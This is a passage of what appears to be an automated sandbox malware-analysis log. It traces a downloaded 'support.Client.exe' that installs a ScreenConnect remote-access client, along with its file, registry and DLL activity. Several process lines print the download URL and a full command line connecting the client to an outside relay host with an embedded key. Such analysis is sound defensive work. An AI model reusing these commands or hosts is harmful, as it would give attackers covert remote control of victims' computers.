              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\C8E534EE129F27D55460CE17FD628216_1130D9B25898B0DB0D4F04DC5B93F141

              Spam, unwanted Advertisements and Ransom Demands

              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security\ScreenConnect
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeKey opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System\ScreenConnect
              Source: C:\Windows\System32\svchost.exeFile created: C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeFile created: C:\Windows\system32\user.config
              Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.drStatic PE information: No import functions for PE file found
              Source: bfb7a509-8b20-4376-b9ba-bfeeb014e662.tmp.0.drStatic PE information: Data appended to the last section found
              Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe.14.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, PopoutPanelTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, ProgramTaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: ScreenConnect.WindowsBackstageShell.exe0.14.dr, TaskbarButton.csTask registration methods: 'CreateDefaultDropDown'
              Source: classification engineClassification label: mal68.evad.win@46/81@7/5
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps
              Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:8136:120:WilError_03
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeMutant created: NULL
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeMutant created: \BaseNamedObjects\Global\netfxeventlog.1.0
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile created: C:\Users\user\AppData\Local\Temp\Deployment
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeFile read: C:\Users\user\Desktop\desktop.ini
              Source: C:\Windows\System32\svchost.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\BITS
              Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2168 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://cp9856.chelokipotlester.icu/Bin/support.Client.exe?h=cp3back96.site&p=8041&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2F0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2FZuAUNQxVB6zV6MkV%2FQ3PQ8O4IKEUzM%2B1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2FCUtP6CZ%2F6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2B48fuhT%2FYi9ukTBmorR&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&i=Untitled%20Session&e=Support&y=Guest&r="
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=5668 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k NetworkService -p
              Source: unknownProcess created: C:\Windows\System32\SgrmBroker.exe C:\Windows\system32\SgrmBroker.exe
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc
              Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\system32\svchost.exe -k UnistackSvcGroup
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=3360 --field-trial-handle=1956,i,12778889090336067455,703406671093003371,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Users\user\Downloads\support.Client.exe "C:\Users\user\Downloads\support.Client.exe"
              Source: C:\Users\user\Downloads\support.Client.exeProcess created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exe"
              Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Defender\MpCmdRun.exe "C:\Program Files\Windows Defender\mpcmdrun.exe" -wdenable
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
              Source: unknownProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exe" "?e=Support&y=Guest&h=cp3back96.site&p=8041&s=5999b697-2fc8-47f6-a1dc-4d0d274c363e&k=BgIAAACkAABSU0ExAAgAAAEAAQB9zMUOcnsRaC12buOM5jB%2f0aQdWfMpUKDaWi13yRXoM16W00nLl4p0ZtEhANoxvmcw0wWFEBncKj1h1Sizr06d2epn5Y1la%2fZuAUNQxVB6zV6MkV%2fQ3PQ8O4IKEUzM%2b1uTT6bVi8cjhVOM7wlYYJcudQAB6Dwlh4JaUc5YEBvhT8MaZnAIYPqnbmxNwUw1RDlaRh5YJbZGPTJPIJpusdEO4D%2fCUtP6CZ%2f6LBYCi1k6apr4NFJdoCsgYMmz0ueWApW6fnSWePa0E3G6vxJQsjXUZXU7nn2pC9y84o5L0uqvKTZ239UPNomZv8wnSyaubzULL%2b48fuhT%2fYi9ukTBmorR&r=&i=Untitled%20Session" "1"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "286148cd-317c-42bd-b1b6-847f55f60348" "User"
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.ClientService.exeProcess created: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe "C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exe" "RunRole" "dab60135-edfb-4837-8e58-b67bfb3544e3" "System"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Windows\System32\svchost.exeSection loaded: userdataplatformhelperutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mccspal.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: syncutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: vaultcli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dmcfgutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dmcmnutils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dmxmlhelputils.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: inproclogger.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: windows.networking.connectivity.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: synccontroller.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: pimstore.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: aphostclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: accountaccessor.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: dsclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: systemeventsbrokerclient.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userdatalanguageutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: mccsengineshared.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: cemapi.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: userdatatypehelperutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: phoneutil.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
              Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: dfshim.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: version.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Downloads\support.Client.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dfshim.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dwrite.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: schannel.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textshaping.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windowscodecs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: textinputframework.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: coremessaging.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mskeyprotect.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ntasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncrypt.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: ncryptsslp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: dpapi.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cryptnet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: cabinet.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: uiautomationcore.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: smartscreenps.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: shdocvw.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: thumbcache.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: slc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: pcacli.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\dfsvc.exeSection loaded: sfc_os.dllJump to behavior
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: mpclient.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: secur32.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sspicli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: version.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: msasn1.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: kernel.appcore.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: userenv.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: gpapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wbemcomn.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: amsi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: profapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: wscapi.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: urlmon.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: iertutil.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: srvcli.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: netutils.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: slc.dll
              Source: C:\Program Files\Windows Defender\MpCmdRun.exeSection loaded: sppc.dll
              Source: C:\Users\user\AppData\Local\Apps\2.0\PBJP0LVB.VXD\EZCCOVKW.H6B\scre..tion_25b0fbb6ef7eb094_0017.0009_1d0f54312371b4fd\ScreenConnect.WindowsClient.exeSection loaded: mscoree.dll
